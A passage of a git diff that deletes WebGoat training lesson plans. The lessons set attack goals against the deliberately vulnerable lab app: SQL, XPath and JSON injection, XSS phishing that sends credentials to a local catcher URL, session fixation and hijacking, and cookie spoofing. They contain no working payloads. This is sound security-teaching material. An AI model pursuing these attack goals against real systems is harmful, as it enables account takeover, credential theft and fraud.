-This lesson teaches how to perform JSON Injection Attacks.
-
-
-
-How the attacks works:
-
-JavaScript Object Notation (JSON) is a simple and effective lightweight data exchange format. JSON can be in a lot of forms such as arrays, lists, hashtables and other data structures.
-JSON is widely used in AJAX and Web2.0 application and is favored by programmers over XML because of its ease of use and speed.
-However, JSON, like XML is prone to Injection attacks. A malicious attacker can inject the reply from the server and inject some arbitrary values in there.
-
-
-General Goal(s):
-
-* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA.
-* Once you enter the three digit code of the airport, an AJAX request will be executed asking for the ticket price.
-* You will notice that there are two flights available, an expensive one with no stops and another cheaper one with 2 stops.
-* Your goal is to try to get the one with no stops but for a cheaper price.
-
-
diff --git a/src/main/webapp/lesson_plans/en/JavaScriptValidation.html b/src/main/webapp/lesson_plans/en/JavaScriptValidation.html
deleted file mode 100644
index 7819de2bf..000000000
--- a/src/main/webapp/lesson_plans/en/JavaScriptValidation.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: How to Bypass Client Side JavaScript Validation
-
-Concept / Topic To Teach:
-
-Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application.
-
-
-General Goal(s):
-For this exercise, the web site requires that you follow certain rules when you fill out a form. The user should be able to break those rules, and send the website input that it wasn't expecting.
-
-This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the
- website input that it wasn't expecting. You must break all 7 validators at the same time.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html b/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html
deleted file mode 100644
index 66293a95c..000000000
--- a/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
-Concept / Topic To Teach:
-Standards Addressed:
-General Goal(s):
-Specific Objectives:
-Required Materials:
-Anticipatory Set (Lead-In):
-Step-By-Step Procedures:
-Plan For Independent Practice:
-Closure (Reflect Anticipatory Set):
-Assessment Based On Objectives:
-Extensions (For Gifted Students):
-Possible Connections To Other Subjects:
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/LogSpoofing.html b/src/main/webapp/lesson_plans/en/LogSpoofing.html
deleted file mode 100644
index 105e38f54..000000000
--- a/src/main/webapp/lesson_plans/en/LogSpoofing.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lesson Plan Title: How to Perform Log Spoofing.
-
-
-Concept / Topic To Teach:
- This lesson teaches attempts to fool the human eye.
-
-
-
-How the attacks works:
-The attack is based on fooling the humane eye in log files. An attacker can erase his traces from the logs
-using this attack.
-
-
-General Goal(s):
-
-* The grey area below represents what is going to be logged in the web server's log file.
-* Your goal is to make it like a username "admin" has succeeded into logging in.
-* Elevate your attack by adding a script to the log file.
-
diff --git a/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html b/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html
deleted file mode 100644
index b5bd6118d..000000000
--- a/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lesson Plan Title: Multi Level Login 1
-
-Concept / Topic To Teach:
-
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having
-logged in with your user name and password you are asked
-for a 'Transaction Authentication Number' (TAN). This is
-often used by online banking. You get a list with a lots
-of TANs generated only for you by the bank. Each TAN is used only once.
-Another method is to provide the TAN by SMS. This has
-the advantage that an attacker can not get TANs provided
-by the user.
-General Goal(s):
-In this Lesson you try to get around the strong authentication.
-You have to break into another account. The user name, password and a
-already used TAN is provided. You have to make sure
-the server accept the TAN even it is already used.
-
diff --git a/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html b/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html
deleted file mode 100644
index 3514b7148..000000000
--- a/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lesson Plan Title: Multi Level Login 2
-
-Concept / Topic To Teach:
-
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having
-logged in with your user name and password you are asked
-for a 'Transaction Authentication Number' (TAN). This is
-often used by online banking. You get a list with a lots
-of TANs generated only for you by the bank. Each TAN is used only once.
-Another method is to provide the TAN by SMS. This has
-the advantage that an attacker can not get TANs provided
-by the user.
-General Goal(s):
-In this lesson you have to try to break into another account.
-You have an own account for WebGoat Financial but you want to
-log into another account only knowing the user name of the victim
-to attack.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/NewLesson.html b/src/main/webapp/lesson_plans/en/NewLesson.html
deleted file mode 100644
index 234b170d8..000000000
--- a/src/main/webapp/lesson_plans/en/NewLesson.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
-Create A WebGoat Lesson
-
-Adding lessons to WebGoat is very easy. If you have an idea that would be suitable
-for a new lesson, follow these few simple instructions to implement it:
-* Download the source code from here.
-* Setup framework: follow the simple instructions in "HOW TO create the WebGoat workspace.txt" that comes with the project.
-* You need to add two files for each new lesson:
- - YourLesson.java to org.owasp.webgoat.lessons
- - YourLesson.html to WebContent/lesson_plans
-
-
diff --git a/src/main/webapp/lesson_plans/en/OffByOne.html b/src/main/webapp/lesson_plans/en/OffByOne.html
deleted file mode 100644
index b35b95996..000000000
--- a/src/main/webapp/lesson_plans/en/OffByOne.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
Lesson Plan Title: How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities
-
-Concept / Topic To Teach:
-How to Exploit a Web Based "Off-by-One" Buffer Overflow.
-
-
-
How the attack works:
-
-Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language.
-
-For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte.
-
-As a result, further information is returned back to the user, due to the fact that no null byte was found.
-
-Lesson Goal(s):
-
-Welcome to the OWASP Hotel ! Can you find out which room a VIP guest is staying in?
-
-* Understand how a buffer overflow vulnerability can be triggered on a web application.
-* Understand what type of value lengths are likely to trigger a buffer overflow.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/PasswordStrength.html b/src/main/webapp/lesson_plans/en/PasswordStrength.html
deleted file mode 100644
index f700fb8fd..000000000
--- a/src/main/webapp/lesson_plans/en/PasswordStrength.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lesson Plan Title: Password Strength
-
-Concept / Topic To Teach:
-
-Accounts are only as secure as their passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals, numbers and special characters. The longer the password, the better, consider using a passphrase instead. For
-more information see: OWASP proper password strength .
-
-
-General Goal(s):
- For this exercise, your job is to test several passwords on https://howsecureismypassword.net/
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html
deleted file mode 100644
index 235bd2528..000000000
--- a/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Bypass a Path Based Access Control Scheme
-
-Concept / Topic To Teach:
-
-In a path based access control scheme, an attacker can traverse a path by providing relative path information. Therefore an attacker can use relative paths to access files that normally are not directly accessible by anyone, or would otherwise be denied if requested directly.
-
-General Goal(s):
-The user should be able to access a file that is not in the listed directory.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/Phishing.html b/src/main/webapp/lesson_plans/en/Phishing.html
deleted file mode 100644
index 9b0127d14..000000000
--- a/src/main/webapp/lesson_plans/en/Phishing.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title: Phishing with XSS
-
- Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side.
- XSS can occur when unvalidated user input is used in an HTTP response.
- With the help of XSS you can do a Phishing Attack and add content to a page
- which looks official. It is very hard for a victim to determinate
- that the content is malicious.
-
-General Goal(s):
-The user should be able to add a form asking for username
-and password. On submit the input should be sent
-to http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
-
diff --git a/src/main/webapp/lesson_plans/en/ReflectedXSS.html b/src/main/webapp/lesson_plans/en/ReflectedXSS.html
deleted file mode 100644
index 9db959e07..000000000
--- a/src/main/webapp/lesson_plans/en/ReflectedXSS.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lesson Plan Title: How to Perform Reflected Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side.
- XSS can occur when unvalidated user input is used in an HTTP response.
- In a reflected XSS attack, an attacker can craft a URL with the attack
- script and post it to another website, email it, or otherwise get a
- victim to click on it.
-
-General Goal(s):
-For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html
deleted file mode 100644
index e852cbcba..000000000
--- a/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lesson Plan Title: How to Force Browser Web Resources
-
-Concept / Topic To Teach:
-Applications will often have an administrative interface that allows privileged users access to functionality that normal users shouldn't see. The application server will often have an admin interface as well.
-Standards Addressed :
-General Goal(s):
-
-Try to access the administrative interface for WebGoat. You may also try to access the administrative interface for Tomcat. The Tomcat admin interface can be accessed via a URL (/admin) and will not count towards the completion of this lesson.
-
-
diff --git a/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html b/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html
deleted file mode 100644
index 132dc235f..000000000
--- a/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: Role Based Access Control
-
-Concept / Topic To Teach:
-
-In role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow obtain unauthorized roles.
-
-General Goal(s):
-Your goal is to explore the access control rules that govern this site. Each role has permission to certain resources (A-F). Each user is assigned one or more roles. Only the user with the [Admin] role should have access to the 'F' resources. In a successful attack, a user doesn't have the [Admin] role can access resource F.
-Lesson Resources:
-Org Chart
-
-Access Control Matrix
-
-Database Schema
diff --git a/src/main/webapp/lesson_plans/en/SQLInjection.html b/src/main/webapp/lesson_plans/en/SQLInjection.html
deleted file mode 100644
index 95f4ae304..000000000
--- a/src/main/webapp/lesson_plans/en/SQLInjection.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: How to Perform a SQL Injection
-
-
-Concept / Topic To Teach:
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queiries, even if the threat of SQL injection has been prevented in some other manner.
-General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also implement code changes in the web application to defeat these attacks.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html b/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html
deleted file mode 100644
index b7db5d10e..000000000
--- a/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lesson Plan Title: Same Origin Policy Protection
-
-Concept / Topic To Teach:
-
-A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous
-calls from the client side to a server. However, as a security measure these requests may
-only be made to the server from which the client page originated.
-
-General Goal(s):
-This exercise demonstrates the Same Origin Policy Protection. XHR requests
-can only be passed back to the originating server. Attempts to pass data to
-a non-originating server will fail.";
diff --git a/src/main/webapp/lesson_plans/en/SessionFixation.html b/src/main/webapp/lesson_plans/en/SessionFixation.html
deleted file mode 100644
index c7e70f3aa..000000000
--- a/src/main/webapp/lesson_plans/en/SessionFixation.html
+++ /dev/null
@@ -1,33 +0,0 @@
-
-
Lesson Plan Title: Session Fixation
-
-
-Concept / Topic To Teach:
-How to steal a session with a 'Session Fixation'
-
-
-
-How the attacks works:
-
-A user is recognized by the server by an unique Session ID. If a
-user has logged in and is authorized he does not have to
-reauthorize when he revisits the application as the user is recognized
-by the Session ID. In some applications it is possible to deliver
-the Session ID in the Get-Request. Here is where the attack starts.
-
-An attacker can send a hyperlink to a victim with a chosen Session ID.
-This can be done for example by a prepared mail which looks like an
-official mail from the application administrator.
-If the victim clicks on the link and logs in he is authorized
-by the Session ID the attacker has chosen. The attacker
-can visit the page with the same ID and is recognized as the victim and
-gets logged in without authorization.
-
-General Goal(s):
-
-This lesson has several stages. You play the attacker but also the victim.
-After having done this lesson it should be understood how
-a Session Fixation in general works. It should be also understood that
-it is a bad idea to use the Get-Request for Session IDs.
-
-
diff --git a/src/main/webapp/lesson_plans/en/SilentTransactions.html b/src/main/webapp/lesson_plans/en/SilentTransactions.html
deleted file mode 100644
index d3377dce8..000000000
--- a/src/main/webapp/lesson_plans/en/SilentTransactions.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Lesson Plan Title: How to Perform Silent Transactions Attacks.
-
-
-Concept / Topic To Teach:
-This lesson teaches how to perform silent transactions attacks.
-
-
-
-How the attacks works:
-
-Any system that silently processes transactions using a single submission is dangerous to the client.
-For example, if a normal web application allows a simple URL submission, a preset session attack will
-allow the attacker to complete a transaction without the user’s authorization.
-In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page,
-so an injected attack script may be able to steal money from the client without authorization.
-
-General Goal(s):
-
-* This is a sample internet banking application - money transfer page.
-* It shows below your balance, the account you are transferring to and amount you will transfer.
-* The application uses AJAX to submit the transaction after doing some basic client side validations.
-* Your goal is to try to bypass the user's authorization and silently execute the transaction.
-
diff --git a/src/main/webapp/lesson_plans/en/SoapRequest.html b/src/main/webapp/lesson_plans/en/SoapRequest.html
deleted file mode 100644
index b96226617..000000000
--- a/src/main/webapp/lesson_plans/en/SoapRequest.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Create a SOAP Request
-
-Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file.
-General Goal(s):
-Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request. You must access 2 of the operations to pass this lesson.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/SqlNumericInjection.html b/src/main/webapp/lesson_plans/en/SqlNumericInjection.html
deleted file mode 100644
index a081c1a29..000000000
--- a/src/main/webapp/lesson_plans/en/SqlNumericInjection.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: How to Perform Numeric SQL Injection
-
-
-Concept / Topic To Teach:
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-General Goal(s):
-The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/StoredXss.html b/src/main/webapp/lesson_plans/en/StoredXss.html
deleted file mode 100644
index e2662164f..000000000
--- a/src/main/webapp/lesson_plans/en/StoredXss.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-
-It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
-
-General Goal(s):
-The user should be able to add message content that cause another user to load an undesireable page or content.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html b/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html
deleted file mode 100644
index 1b01a915d..000000000
--- a/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
- Lesson Plan
-
-
-
-
-
Lesson Plan Title: How to Exploit Thread Safety Problems
-
-
-Concept / Topic To Teach:
-
- Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-
-General Goal(s):
-The user should be able to exploit the concurrency error in the web application and view login information for another user that is attempting the same function at the same time. This will require the use of two browsers .
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/TomcatSetup.html b/src/main/webapp/lesson_plans/en/TomcatSetup.html
deleted file mode 100644
index decbd49df..000000000
--- a/src/main/webapp/lesson_plans/en/TomcatSetup.html
+++ /dev/null
@@ -1,80 +0,0 @@
-
-How To Configure Tomcat
-Introduction
-WebGoat comes with default configurations for Tomcat. This page will explain these configurations
-and other possible configurations for Tomcat. This is just
-a short description which should be enough in most cases. For more advanced tasks please
-refer to the Tomcat documentation. Please note that all solutions
-are written for the standard configurations on port 80 or 8080. If you use another port you have
-to adjust the solution to your configuration.
-
-The Standard Configurations
-WebGoat has multiple ways of being run. The
-WebGoat Wiki is the best place to find the latest configuration instructions.
-By default WebGoat will run on port 8080. In the basic configurations you use the server on your localhost.
-In Linux you have to start WebGoat as root or with sudo if you want to run it on port 80 and
- 443. Running software as root is dangerous we strongly advice to use
-the port 8080 and 8443.
-
-
-Server Configurations
-
-If you are a single user of WebGoat the standard configurations should be
-enough but if you want to use WebGoat in laboratory or in class there
-might be the need to change the configurations. Before changing
-the configurations we recommend doing a backup of the files you change.
-
-
-Change Ports
-
-To change the ports open Tomcat's server.xml which you find in tomcat/conf and change the
-non-SSL port. If you want to change your
-Tomcat server to use it on port 8079 for example:
-
-
-
-<!-- Define a non-SSL HTTP/1.1 Connector on port 8079 -->
-<Connector address="127.0.0.1" port="8079"...
-
-
-You can also change the SSL connector to another port of course.
-In this example to port 8442:
-
-
-<!-- Define a SSL HTTP/1.1 Connector on port 8442 -->
-<Connector address="127.0.0.1" port="8442"...
-
-
-You can also modify WebGoat's pom.xml file to change the port. You will need to modify
-the tomcat7-maven-plugin plugin configuration.
-
-
-
-Make WebGoat Reachable From Another Client
-THIS MAKES IT POSSIBLE TO REALLY ATTACK YOUR SERVER! DO NOT DO THIS
- UNTIL YOU KNOW WHAT YOU ARE DOING. THIS CONFIGURATION SHOULD BE ONLY USED IN
-SAFE NETWORKS!
-By its default configuration, WebGoat is only
-reachable within the localhost. In a laboratory or a class
-there is maybe the need of having a server and a few clients.
-In this case it is possible to make WebGoat reachable.
-
-
-Permit Only Certain Client Connection
-
-If you have made WebGoat reachable it is reachable for
-all clients. If you want to make it reachable only for certain clients specified
-by their IP you can archive this by using a 'Remote Address Filter'.
-The filter can be set in a whitebox or blackbox approach. Here is
-only discussed the whitebox approach. You have to add following lines to the
-Host section of server.xml in your Tomcat server configuration:
-
-
- <Valve className="org.apache.catalina.valves.RemoteAddrValve"
- allow="127.0.0.1,ip1,ip2"/>
-
-In this case only localhost, ip1 and ip2 are permitted to connect.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/TraceXSS.html b/src/main/webapp/lesson_plans/en/TraceXSS.html
deleted file mode 100644
index 2358d4fc4..000000000
--- a/src/main/webapp/lesson_plans/en/TraceXSS.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Tracing (XST) Attacks
-
-Concept / Topic To Teach:
-
-It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
-General Goal(s):
-Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/UncheckedEmail.html b/src/main/webapp/lesson_plans/en/UncheckedEmail.html
deleted file mode 100644
index db3c630e9..000000000
--- a/src/main/webapp/lesson_plans/en/UncheckedEmail.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Exploit Unchecked Email
-
-Concept / Topic To Teach:
-
-It is always a good practice to validate all inputs. Most sites allow non-authenticated users to send email to a 'friend'. This is a great mechanism for spammers to send out email using your corporate mail server.
-
-General Goal(s):
-The user should be able to send and obnoxious email message.
diff --git a/src/main/webapp/lesson_plans/en/UsefulTools.html b/src/main/webapp/lesson_plans/en/UsefulTools.html
deleted file mode 100644
index 99bee445d..000000000
--- a/src/main/webapp/lesson_plans/en/UsefulTools.html
+++ /dev/null
@@ -1,41 +0,0 @@
-
-
-Useful Tools
-
-Below is a list of tools we've found useful in solving the WebGoat lessons. You will need a proxy like OWASP ZAP or Paros to solve most of the lessons.
-OWASP ZAP:
-
-Like WebGoat, Zed Attack Proxy (ZAP) is a part of OWASP and is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
-It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
-ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually..
-
-Webpage: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
- The .jar install file can be found at the OWASP ZAP Google Code Project
-After installing ZAP and configuring your browser to use it as a proxy on localhost we can start. To intercept a request,
-click the green arrow icon turning it red. If we browse a WebGoat page, ZAP will intercept the HTTP request.
-Here we can read and edit the intercepted parameters and headers. After editing is complete press the play icon to submit the request to the server.
-
-
-Modern Browsers:
-
-Most modern browser have developer tools that will allow you to inspect and modify request data.
-
-
-
Wireshark
-
-Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful
-informations this way.
-
-Webpage:http://www.wireshark.org
-
-
-
-Scanners (Attacking Proxies):
-
-There are many vulnerability scanners for your own web applications. They can find XSS, Injection Flaws and other vulnerabilities. Below are links to three open source scanners.
-Nessus:http://www.nessus.org
-Paros:http://www.parosproxy.org
-OWASP ZAP:https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/WSDLScanning.html b/src/main/webapp/lesson_plans/en/WSDLScanning.html
deleted file mode 100644
index dd80ef598..000000000
--- a/src/main/webapp/lesson_plans/en/WSDLScanning.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform WSDL Scanning
-
-Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
-General Goal(s):
-This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html
deleted file mode 100644
index 9c9b86c8a..000000000
--- a/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Spoof an Authentication Cookie
-
-
-Concept / Topic To Teach:
-
-Many applications will automatically log a user into their site if the right authentication cookie is specified. Some times the cookie values can be guessed if the algorithm for generating the cookie can be obtained. Some times the cookies are left on the client machine and can be stolen by exploiting another system vulnerability. Some times the cookies maybe intercepted using Cross site scripting. This lesson tries to make the student aware of authentication cookies and presents the student with a way to defeat the cookie authentication method in this lesson.
-General Goal(s):
-
- The user should be able to bypass the authentication check.
-Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WeakSessionID.html b/src/main/webapp/lesson_plans/en/WeakSessionID.html
deleted file mode 100644
index 45157e0b5..000000000
--- a/src/main/webapp/lesson_plans/en/WeakSessionID.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Hijack a Session
-
-Concept / Topic To Teach:
-
-Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
-General Goal(s):
-Try to access an authenticated session belonging to someone else.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WelcomeScreeen.html b/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
deleted file mode 100644
index be93e40e2..000000000
--- a/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title:Welcome
-
-Concept / Topic To Teach:
-This lesson presents the basics for understanding the transfer of data between the browser and the web application.
-Standards Addressed:
-General Goal(s):
-Specific Objectives:
-Required Materials:
-Anticipatory Set (Lead-In):
-Step-By-Step Procedures:
-Plan For Independent Practice:
-Closure (Reflect Anticipatory Set):
-Assessment Based On Objectives:
-Extensions (For Gifted Students):
-Possible Connections To Other Subjects:
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WsSAXInjection.html b/src/main/webapp/lesson_plans/en/WsSAXInjection.html
deleted file mode 100644
index 23a2e8607..000000000
--- a/src/main/webapp/lesson_plans/en/WsSAXInjection.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Perform Web Service SAX Injection
-
-Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
-General Goal(s):
-Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.
-
-
-In this exercise, try to change the password for a user other than 101.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WsSqlInjection.html b/src/main/webapp/lesson_plans/en/WsSqlInjection.html
deleted file mode 100644
index 95738b0bf..000000000
--- a/src/main/webapp/lesson_plans/en/WsSqlInjection.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform Web Service SQL Injection
-
-Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
-General Goal(s):
-Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/XMLInjection.html b/src/main/webapp/lesson_plans/en/XMLInjection.html
deleted file mode 100644
index fc9c73697..000000000
--- a/src/main/webapp/lesson_plans/en/XMLInjection.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lesson Plan Title: How to Perform XML Injection Attacks.
-
-
-Concept / Topic To Teach:
- This lesson teaches how to perform XML Injection attacks.
-
-
-
-How the attacks works:
-
-AJAX applications use XML to exchange information with the server. This XML can be easily intercepted and altered by a malicious attacker.
-
-
-General Goal(s):
-
-WebGoat-Miles Reward Miles shows all the rewards available. Once you've entered your account ID, the lesson will show you your balance and the products you can afford. Your goal is to try to add more rewards to your allowed set of rewards. Your account ID is 836239.
-
-
diff --git a/src/main/webapp/lesson_plans/en/XPATHInjection.html b/src/main/webapp/lesson_plans/en/XPATHInjection.html
deleted file mode 100644
index 926d8f151..000000000
--- a/src/main/webapp/lesson_plans/en/XPATHInjection.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Lesson Plan Title: How to Perform XPATH Injection Attacks.
-
-
-Concept / Topic To Teach:
- This lesson teaches how to perform XPath Injection attacks.
-
-
-
-How the attacks works:
-
-Similar to SQL Injection, XPATH Injection attacks occur when a web site uses user supplied information to query XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured or access data that they may not normally have access to.
-They may even be able to elevate their privileges on the web site if the xml data is being used for authentication (such as an xml based user file).
-
-Querying XML is done with XPath, a type of simple descriptive statement that allows the xml query to locate a piece of information. Like SQL you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
-
-
-
-General Goal(s):
-
-The form below allows employees to see all their personal data including their salaries. Your account is Mike/test123. Your goal is to try to see other employees data as well.
-
diff --git a/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html b/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
deleted file mode 100644
index e45d57ddf..000000000
--- a/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
